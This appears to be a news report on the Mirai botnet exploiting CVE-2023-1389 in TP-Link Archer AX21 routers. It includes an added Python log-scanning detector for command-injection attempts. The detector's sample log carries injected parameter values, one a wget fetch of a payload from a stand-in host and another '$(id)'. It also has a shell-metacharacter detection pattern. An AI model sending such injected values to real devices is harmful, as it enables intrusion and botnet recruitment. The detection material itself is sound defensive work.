Mirai botnet updates its arsenal with TP-Link Archer WiFi router bug

Threat actors behind the Mirai botnet are actively exploiting a recently patched TP-Link Archer WiFi router vulnerability, the Zero Day Initiative (ZDI) threat hunting team warns.

Tracked as CVE-2023-1389, the vulnerability is an unauthenticated command injection in the local API of the web management interface of the TP-Link Archer AX21 router. It allows a remote attacker to execute arbitrary commands on the target system by passing specially crafted data to the application. TP-Link addressed the vulnerability in March 2023 in a new firmware update.

The first exploitation attempts were observed starting April 11, 2023, mostly targeting devices in Eastern Europe, with infections rapidly spreading worldwide.

ZDI said that a new version of the Mirai malware botnet now exploits the vulnerability to gain access to the device. It then executes the appropriate binary payload for the target system architecture to ensnare the device into its botnet.
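An added example, not code from ZDI's report or from TP-Link: a small Python detector that scans constructed router access-log lines for requests to the web management API whose URL-decoded parameter values carry shell metacharacters, the hallmark of a command-injection attempt like the one described above. The endpoint path, parameter name, log format and session field are assumptions for illustration, not the Archer AX21's real interface.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed sample log lines. The /api/v1/ path, the "region" parameter
# and the trailing quoted session field are assumptions for illustration;
# they are not the router's actual interface or log format.
SAMPLE_LOG = """\
203.0.113.7 - - [11/Apr/2023:10:02:13 +0000] "GET /api/v1/settings?region=US HTTP/1.1" 200 512 "-"
203.0.113.9 - - [11/Apr/2023:10:02:15 +0000] "GET /api/v1/settings?region=US%3Bwget+http%3A%2F%2Fexample.invalid%2Fbin HTTP/1.1" 200 0 "-"
192.0.2.4 - - [11/Apr/2023:10:03:01 +0000] "POST /api/v1/settings?region=%24(id) HTTP/1.1" 403 0 "sess=abc123"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<session>[^"]*)"$'
)
# Shell metacharacters that have no business inside a settings value.
META_RE = re.compile(r'[;|`&]|\$\(|\$\{|\n')


def flag_command_injection(log_text: str, api_prefix: str = "/api/v1/") -> list:
    """Return one dict per request to the management API whose URL-decoded
    query values contain shell metacharacters. 'authenticated' records
    whether the request carried a session field at all."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m.group("target"))
        if not url.path.startswith(api_prefix):
            continue
        for key, value in parse_qsl(url.query, keep_blank_values=True):
            # parse_qsl decodes once; decode again to catch double-encoding.
            decoded = unquote(value)
            if META_RE.search(decoded):
                hits.append({
                    "ip": m.group("ip"),
                    "param": key,
                    "value": decoded,
                    "authenticated": m.group("session") not in ("-", ""),
                })
    return hits
```

Hits without a session deserve first attention, since the flaw is reachable without credentials; a metacharacter in an authenticated request is still worth a look but may be an administrator's typo.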

The observed version of Mirai appears to be focused on launching DDoS attacks against game servers, as it comes with an array of functions, including the ability to launch attacks against Valve Source Engine (VSE).

“Seeing this CVE being exploited so quickly after the patch being released is a clear demonstration of the decreasing ‘time-to-exploit’ speed that we continue to see across the industry. That said, this is nothing new for the maintainers of the Mirai botnet, who are known for quickly exploiting IoT devices to maintain their foothold in an enterprise,” the ZDI team said.
